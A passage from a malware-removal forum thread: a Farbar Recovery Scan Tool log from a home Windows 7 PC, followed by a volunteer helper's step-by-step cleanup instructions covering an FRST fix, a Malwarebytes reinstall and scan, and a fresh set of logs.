2015-02-10 07:21 - 2010-10-09 17:43 - 00001483 _____ () C:\Users\Becky's\Desktop\System Mechanic Professional.lnk
2015-02-10 07:21 - 2010-10-09 17:43 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Mechanic Professional
2015-02-10 07:19 - 2013-12-15 11:49 - 00000000 ____D () C:\ProgramData\ioloGovernor
2015-02-10 07:19 - 2013-12-15 11:48 - 00003144 _____ () C:\Windows\System32\Tasks\iolo Process Governor
2015-02-10 07:19 - 2010-10-09 17:41 - 00000000 ____D () C:\Users\Becky's\AppData\Roaming\iolo
2015-02-10 03:18 - 2009-07-13 21:20 - 00000000 ____D () C:\Windows\rescache
2015-02-09 19:43 - 2014-11-19 08:48 - 00000000 ____D () C:\Windows\Minidump
2015-02-09 17:12 - 2011-11-02 17:16 - 00000000 _____ () C:\Windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt
2015-02-09 15:11 - 2014-11-06 19:45 - 00000000 ____D () C:\ProgramData\c695232b1d2f189
2015-02-09 15:00 - 2011-07-04 09:26 - 00000000 ____D () C:\Users\Becky's\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DiskInternals
2015-02-09 14:47 - 2014-05-06 02:01 - 00000000 ___SD () C:\Windows\system32\CompatTel
2015-02-09 14:47 - 2009-07-13 21:20 - 00000000 ____D () C:\Windows\AppCompat
2015-02-09 14:46 - 2009-07-13 21:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2015-02-01 18:43 - 2013-08-15 02:03 - 00000000 ____D () C:\Windows\system32\MRT
2015-02-01 15:07 - 2009-07-13 23:13 - 00796158 _____ () C:\Windows\system32\PerfStringBackup.INI

==================== Files in the root of some directories =======

2010-01-13 17:20 - 2014-10-06 19:22 - 0001050 _____ () C:\Users\Becky's\AppData\Roaming\wklnhst.dat
2013-10-06 16:06 - 2013-10-06 16:06 - 0000095 _____ () C:\Users\Becky's\AppData\Local\fusioncache.dat
2010-12-01 14:44 - 2013-08-05 16:14 - 0007617 _____ () C:\Users\Becky's\AppData\Local\Resmon.ResmonCfg
2011-04-26 18:50 - 2011-04-26 18:50 - 0238344 _____ () C:\Users\Becky's\AppData\Local\tmp0416011527.0
2011-04-26 18:50 - 2011-04-26 18:50 - 0220848 _____ () C:\Users\Becky's\AppData\Local\tmp0416011527.1
2011-04-26 18:50 - 2011-04-26 18:50 - 0223076 _____ () C:\Users\Becky's\AppData\Local\tmp0416011527.2
2011-04-26 18:50 - 2011-04-26 18:50 - 0220847 _____ () C:\Users\Becky's\AppData\Local\tmp0416011527.JPG
2013-01-15 16:01 - 2013-01-15 16:01 - 1256617 _____ () C:\Users\Becky's\AppData\Local\tmpPICTURE 054.JPG

Some content of TEMP:
====================
C:\Users\Becky's\AppData\Local\Temp\Quarantine.exe
C:\Users\Becky's\AppData\Local\Temp\sqlite3.dll
C:\Users\Everyone else\AppData\Local\Temp\Setup.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-02-09 15:46

==================== End Of Log ============================

 

Addition

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 11-02-2015 02
Ran by Becky's at 2015-02-11 16:59:05
Running from C:\Users\Becky's\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: System Shield (Enabled - Up to date) {3030810C-E2AC-B12D-8BB1-B1B8C0193798}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: System Shield (Enabled - Up to date) {8B5160E8-C496-BEA3-B101-8ACABB9E7D25}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.0.3.13070 - Adobe Systems Inc.)
Adobe Flash Player 16 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.06) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.06 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{F5266D28-E0B2-4130-BFC5-EE155AD514DC}) (Version: 2.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
AVSDK5 (Version: 5.4.11 - CYREN Inc.) Hidden
Belarc Advisor 8.1 (HKLM-x32\...\Belarc Advisor) (Version:  - )
Belkin N1 Wireless Desktop Card (HKLM-x32\...\{15EEFF80-97EC-43C4-BDD4-50E4A8E3117D}) (Version: 1.00.0000 - Belkin)
Canon Easy-PhotoPrint EX (HKLM-x32\...\Easy-PhotoPrint EX) (Version: 4.1.5 - Canon Inc.)
Canon Inkjet Printer Driver Add-On Module V2.00 (HKLM\...\CANONIJINBOXADDON200) (Version:  - )
Canon iP2600 series (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_iP2600_series) (Version:  - )
Canon iP2600 series User Registration (HKLM-x32\...\Canon iP2600 series User Registration) (Version:  - )
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.1.0 - Canon Inc.)
Canon Utilities Solution Menu (HKLM-x32\...\CanonSolutionMenu) (Version:  - )
CCleaner (HKLM\...\CCleaner) (Version: 3.01 - Piriform)
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
CyberLink DVD Suite Deluxe (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 6.0.3101 - CyberLink Corp.)
DirectX for Managed Code Update (Summer 2004) (x32 Version: 9.02.2904 - Microsoft) Hidden
ffdshow [rev 2527] [2008-12-19] (HKLM-x32\...\ffdshow_is1) (Version: 1.0 - )
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP Advisor (HKLM-x32\...\{40FB8D7C-6FF8-4AF2-BC8B-0B1DB32AF04B}) (Version: 3.3.12286.3436 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.0.71 - WildTangent)
HP MediaSmart Demo (HKLM-x32\...\{9DEF9686-CCB2-47B7-BF83-B49EA21FA016}) (Version: 1.00.0000 - Hewlett-Packard)
HP MediaSmart DVD (HKLM-x32\...\InstallShield_{DCCAD079-F92C-44DA-B258-624FC6517A5A}) (Version: 3.0.3123 - Hewlett-Packard)
HP MediaSmart Movie Themes (HKLM-x32\...\InstallShield_{3023EBDA-BF1B-4831-B347-E5018555F26E}) (Version: 3.0.3102 - Hewlett-Packard)
HP MediaSmart Music/Photo/Video (HKLM-x32\...\InstallShield_{B2EE25B9-5B00-4ACF-94F0-92433C28C39E}) (Version: 3.0.3205 - Hewlett-Packard)
HP MediaSmart SmartMenu (HKLM\...\{26280024-DFB7-4967-90DB-7F9C6660D01E}) (Version: 3.0.28.2 - Hewlett-Packard)
HP Odometer (HKLM-x32\...\{B8AC1A89-FFD1-4F97-8051-E505A160F562}) (Version: 2.10.0000 - Hewlett-Packard)
HP Remote Solution (HKLM-x32\...\HP Remote Solution) (Version: 1.1.9.0 - TopSeed)
HP Setup (HKLM-x32\...\{F3B912F5-EB57-45AA-B3D1-EB532BCF6EF8}) (Version: 1.2.3220.3079 - Hewlett-Packard)
HP Support Information (HKLM-x32\...\{B9A03B7B-E0FF-4FB3-BA83-762E58A1B0AA}) (Version: 10.1.0002 - Hewlett-Packard)
HP Update (HKLM-x32\...\{D46D081B-F60E-467E-A7C4-117B70D76731}) (Version: 5.001.000.014 - Hewlett-Packard)
iolo technologies' System Mechanic Professional (HKLM-x32\...\{BBD3F66B-1180-4785-B679-3F91572CD3B4}_is1) (Version: 14.0.1 - iolo technologies, LLC)
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1901 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.1901 - CyberLink Corp.) Hidden
LightScribe System Software (HKLM-x32\...\{DD6C316A-FE75-4FBB-9D22-4C1920232B72}) (Version: 1.18.5.1 - LightScribe)
Logitech Harmony Remote Software (HKLM-x32\...\{634F79E1-2A41-4C40-9E8D-89EC740AC9D6}) (Version: 1.0.110307 - Logitech)
Logitech Harmony Remote Software 7 (HKLM-x32\...\{5C6F884D-680C-448B-B4C9-22296EE1B206}) (Version: 7.7.0.0 - Logitech)
Malwarebytes Anti-Malware version 1.75.0.1300 (HKLM-x32\...\Malwarebytes' Anti-Malware_is1) (Version: 1.75.0.1300 - Malwarebytes Corporation)
Microsoft .NET Framework 1.1 (HKLM-x32\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft IntelliPoint 8.2 (HKLM\...\Microsoft IntelliPoint 8.2) (Version: 8.20.468.0 - Microsoft Corporation)
Microsoft Office Home and Student 60 day trial (HKLM\...\OfficeTrial) (Version:  - )
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM-x32\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175 (HKLM\...\{aac9fcc4-dd9e-4add-901c-b5496a07ab2e}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148 (HKLM\...\{EE936C7A-EA40-31D5-9B65-8E3E089C3828}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM-x32\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
MotoHelper 2.0.24 Driver 4.7.1 (HKLM-x32\...\MotoHelper) (Version: 2.0.24 - Motorola)
MotoHelper MergeModules (x32 Version: 1.0.0 - Motorola) Hidden
Motorola Mobile Drivers Installation 4.7.1 (Version: 4.7.1 - Motorola Inc.) Hidden
Mozilla Firefox 35.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 35.0.1 (x86 en-US)) (Version: 35.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 30.0 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
NVIDIA Display Control Panel (HKLM\...\NVIDIA Display Control Panel) (Version: 6.14.11.9739 - NVIDIA Corporation)
NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version: 1.10.58.36 - NVIDIA Corporation)
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.3101 - CyberLink Corp.)
Power2Go (x32 Version: 6.0.3101 - CyberLink Corp.) Hidden
PowerDirector (HKLM-x32\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 7.0.3101 - CyberLink Corp.)
PowerDirector (x32 Version: 7.0.3101 - CyberLink Corp.) Hidden
PowerRecover (x32 Version: 5.5.1923 - CyberLink Corp.) Hidden
PVSonyDll (Version: 1.00.0001 - NVIDIA Corporation) Hidden
QuickBooks Pro 2007 (HKLM-x32\...\{7E545666-F422-45FD-B3DF-C0B99A1A579F}) (Version:  - )
QuickBooks Product Listing Service (HKLM-x32\...\{91208A47-5D08-4C79-986F-1931940F51BB}) (Version: 2.0.148 - Intuit)
QuickTime (HKLM-x32\...\{B67BAFBA-4C9F-48FA-9496-933E3B255044}) (Version: 7.74.80.86 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6196 - Realtek Semiconductor Corp.)
Remote Control USB Driver (HKLM-x32\...\{8471021C-F529-43DE-84DF-3612E10F58C4}) (Version: 2.3.2.317 - )
SupportSoft Assisted Service (HKLM-x32\...\{5A3F6A80-7913-475E-8B96-477A952CFA43}) (Version: 15 - SupportSoft)
System Mechanic 11 Professional (x32 Version: 14.0.1 - ) Hidden
TaxACT 2002 (HKLM-x32\...\TaxACT 2002) (Version:  - 2nd Story Software, Inc.)
Unity Web Player (HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
WOT for Internet Explorer (HKLM-x32\...\{1D10C273-3F95-42A2-8371-AB6B1F59821B}) (Version: 10.12.20.0 - WOT Services Oy)
WOT for Internet Explorer (HKLM-x32\...\{DCAEC601-735C-41AE-B84F-D792F09FB7D1}) (Version: 12.8.2.0 - WOT Services Oy)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)


==================== Restore Points  =========================

11-02-2015 00:00:06 Scheduled Checkpoint

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 20:34 - 2009-06-10 15:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {19861785-BDD8-42B4-B3F3-CDEC9645B61E} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {33C935F7-DEC4-4B25-B766-F94EB2B1B983} - System32\Tasks\SidebarExecute => C:\Program Files (x86)\Windows Sidebar\sidebar.exe [2010-11-20] (Microsoft Corporation)
Task: {3C6FDAA5-1542-460E-BE03-ACA2716CB245} - System32\Tasks\iolo Process Governor => C:\Program Files (x86)\iolo\System Mechanic Professional\iologovernor64.exe [2014-08-13] (iolo technologies, LLC)
Task: {49EF4FC3-AB93-46D1-9C54-25FC137C205B} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Opt-in For HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF_Utils.exe [2013-11-04] (Hewlett-Packard Company)
Task: {4C583E9A-8E4A-490F-9EA8-A5D7EE9F59BB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2014-05-12] (Hewlett-Packard Company)
Task: {55156DFC-1E3F-4928-A7BB-BA9B4DAD1B68} - System32\Tasks\MotoHelper MUM => C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperUpdate.exe [2010-09-07] ()
Task: {6649D7FA-1AC5-4AEF-9FF7-4FA75A8F2DD9} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-02-10] (Adobe Systems Incorporated)
Task: {74609C4E-09FA-4988-BB96-7D5B449F8002} - System32\Tasks\DVDAgent => c:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe [2009-07-23] (CyberLink Corp.)
Task: {80187BC4-308F-46A2-B8E1-04E888D8E830} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {92540DDD-8770-4013-8908-1A2C0A0AC1CD} - System32\Tasks\MotoHelper Update => C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperUpdate.exe [2010-09-07] ()
Task: {95A62856-7F89-4E97-A887-F0148640F012} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => c:\Program Files\Microsoft IntelliPoint\IPoint.exe [2011-08-01] (Microsoft Corporation)
Task: {CBEDB8AB-6140-4083-BC35-B36CAA7B546E} - System32\Tasks\HPCeeScheduleForBecky's => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard)
Task: {CF678EB2-51CA-4090-B4FB-914C8FBED892} - System32\Tasks\MotoHelper Routing => C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperUpdate.exe [2010-09-07] ()
Task: {D7537E41-D01A-4847-91C5-7FB95114D265} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {E339F3FA-AAA2-4BAC-8B27-7A58FFAA9812} - System32\Tasks\CLMLSvc => c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe [2009-08-05] (CyberLink)
Task: {FAEFB722-03EA-4983-B3F2-59EB9D03E483} - System32\Tasks\RecoveryCDWin7 => C:\Program Files (x86)\Hewlett-Packard\HP TCS\RemEngine.exe [2009-07-08] ()
Task: {FF53208F-0D62-4B0F-A0A2-6B2C63436788} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2015-01-21] (Hewlett-Packard)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\HPCeeScheduleForBecky's.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Loaded Modules (whitelisted) ==============

2010-10-09 17:43 - 2009-12-02 14:30 - 00160256 _____ () C:\Windows\system32\iavlsp64.dll
2009-07-08 15:35 - 2009-07-08 15:35 - 00610360 _____ () C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
2013-10-05 14:42 - 2013-10-05 14:42 - 03379200 _____ () c:\windows\assembly\nativeimages1_v1.1.4322\mscorlib\1.0.5000.0__b77a5c561934e089_a8a3b71c\mscorlib.dll
2013-10-05 14:41 - 2013-10-05 14:41 - 01953792 _____ () c:\windows\assembly\nativeimages1_v1.1.4322\system\1.0.5000.0__b77a5c561934e089_82589bb0\system.dll
2009-08-05 14:45 - 2009-08-05 14:45 - 00931112 ____N () c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMediaLibrary.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\Temp:A8ADE5D8
AlternateDataStreams: C:\ProgramData\Temp:DFC5A2B2

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AMP => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AMPSE => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\EventSystem => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ioloSystemService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vseamps => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vsedsps => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vseqrts => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AMP => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AMPSE => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EventSystem => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ioloSystemService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vseamps => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vsedsps => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vseqrts => ""="Service"

==================== EXE Association (whitelisted) ===============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Becky's\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 208.67.222.222 - 208.67.220.220

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)


==================== Accounts: =============================

Administrator (S-1-5-21-2807770644-2077775581-3253585677-500 - Administrator - Disabled)
ASPNET (S-1-5-21-2807770644-2077775581-3253585677-1007 - Limited - Enabled)
Becky's (S-1-5-21-2807770644-2077775581-3253585677-1000 - Administrator - Enabled) => C:\Users\Becky's
Everyone else (S-1-5-21-2807770644-2077775581-3253585677-1005 - Limited - Enabled) => C:\Users\Everyone else
Guest (S-1-5-21-2807770644-2077775581-3253585677-501 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-2807770644-2077775581-3253585677-1004 - Limited - Enabled)

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================

System errors:
=============
Error: (02/11/2015 03:10:46 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
FileDisk

Error: (02/11/2015 03:10:36 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The iolo FileInfoList Service service failed to start due to the following error:
%%1083

Error: (02/11/2015 03:09:51 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \SystemRoot\SysWow64\Drivers\FileDisk.SYS has been blocked from loading due to incompatibility with this system. Please contact your software vendor for a compatible version of the driver.


Microsoft Office Sessions:
=========================

==================== Memory info ===========================

Processor: AMD Sempron™ Processor LE-1200
Percentage of memory in use: 78%
Total physical RAM: 894.49 MB
Available physical RAM: 194.6 MB
Total Pagefile: 2176.42 MB
Available Pagefile: 731.26 MB
Total Virtual: 8192 MB
Available Virtual: 8191.83 MB

==================== Drives ================================

Drive c: (HP) (Fixed) (Total:286.05 GB) (Free:220.15 GB) NTFS
Drive d: (FACTORY_IMAGE) (Fixed) (Total:11.94 GB) (Free:2.23 GB) NTFS ==>[System with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: 1549F232)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=286.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=11.9 GB) - (Type=07 NTFS)

==================== End Of Log ============================


  • 0

#5
BrianDrab
Posted 11 February 2015 - 07:30 PM

BrianDrab

    Trusted Helper

  • Malware Removal
  • 3,591 posts

Hi Brian, thanks for your assistance

No problem. Thanks for the information. Now please do the following.
 
Step#1 - Warnings
CCleaner
I see that you have CCleaner installed. This is indeed a good product but I wanted to caution you on running the registry cleaning functionality of the tool. Please avoid this as it can do more harm than good.
 
Windows Sidebar/Gadgets
I see from your logs that you may use the Windows Sidebar with Gadgets. Microsoft deems these as a security vulnerability and recommends that they are disabled. Unless you have good reason not to, please download and install the Microsoft Fix-It from here. Note: Please ensure you reboot when prompted. If you don't and continue this could leave your machine in an unstable state.
 
Low on Memory
Your machine is very low on memory. You may notice that your computer is sluggish at times as a result...especially when you have multiple programs open at once. If you plan on keeping your machine for a while it may benefit you greatly to add some memory. It appears you have 1GB of memory. The minimum requirements for Windows 7 64-bit is 2 GB. Add on top of that memory requirements for your Antivirus from System Mechanic (which is 512MB) and you quickly run out of memory. My suggestion would be to add at least another 1GB. A very good site you can go to is Crucial.com. The site will scan your machine to determine what type of memory you currently have in your system and provide you options to upgrade.
 
Step#2 - FRST Fix
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
1. Download attached file and save it to the Desktop. Attached File  fixlist.txt   2.01KB   85 downloads
Note. It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work (in this case...the desktop).
2. Run FRST64 by Right-Clicking on the file and choosing Run as administrator.
3. Press the Fix button just once and wait. If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
4. When finished FRST64 will generate a log on the Desktop (Fixlog.txt). Please post the contents of it in your reply.

 

Step#3 - Malwarebytes Scan

  • First Uninstall the version that is currently on the machine. Malwarebytes Anti-Malware version 1.75.0.1300. We will be installing a newer version. If you need to know how to uninstall a program instructions for doing so are here.
  • Download Malwarebytes to your desktop from here.
  • Right-click on the file that is downloaded to your desktop and select Run as administrator.
  • Select the appropriate language and click OK.
  • Click Next.
  • Select "I accept the agreement" and click Next.
  • Click Next
  • Change the install path if desired. Normally you will keep this as is. Click Next.
  • Click Next again.
  • Click Next again.
  • Click Install.
  • Uncheck "Enable free trial of Malwarebytes Anti-Malware Premium".
  • Click Finish
  • If an update is found you will be prompted to download and install. Go ahead.
  • Click the Settings button and then the Detection and Protection tab. Then check the box to Scan for rootkits. as shown below.
  • RootKitCheckBox.JPG
     
  • Click the Scan button at the top of the form and then click Scan Now.
    2.JPG
  • If anything is detected, there will be an Apply Actions button. Please click this.
  • Once the scan completes click the View detailed log link.
    3.JPG
  • Then click the Copy to clipboard button and paste into your next post.
    4.JPG

 

Step#4 - Fresh Set of Logs
1. Right click on FRST64.exe and select Run as administrator. When the tool opens click Yes to disclaimer.
2. Please ensure you place a check mark in the Addition.txt check box at the bottom of the form before running.
